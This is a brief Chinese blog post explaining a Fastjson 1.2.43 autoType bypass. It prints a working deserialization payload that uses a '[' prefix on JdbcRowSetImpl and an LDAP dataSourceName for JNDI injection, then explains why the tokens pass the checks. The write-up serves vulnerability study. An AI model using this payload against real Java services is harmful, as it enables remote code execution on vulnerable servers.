标签:25 rowset Java Fastjson1.2 1.2 42 43 序列化
0x00 前言
1.2.24可参考:1.2.24fastjson
1.2.25-1.2.41 可参考:1.2.25
1.2.25-1.2.42 可参考:1.2.42
这篇就单纯划水~
0x01 正文
在1.2.43中,修复了LL,但是又有新的东西可以利用,因为在loadclass中还会去处理"[“那么我们现在就可以通过”["进行绕过,先上payload再进行说明
String payload="{\"@type\":\"[com.sun.rowset.JdbcRowSetImpl\"[{,\"dataSourceName\":\"ldap://localhost:9999/a\",\"autoCommit\":true" ;
首先是[com.sun.rowset.JdbcRowSetImpl,通过这个方式可以过checkAutotype检测。
其次是[{,"dataSourceName,这里的[{主要目的是通过fastjson的自动检测,实际上就是对token进行控制,这里如果是[的话就会让token变为14从而通过之后的检测
标签:25,rowset,Java,Fastjson1.2,1.2,42,43,序列化 来源: https://blog.csdn.net/qq_36869808/article/details/123201615
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。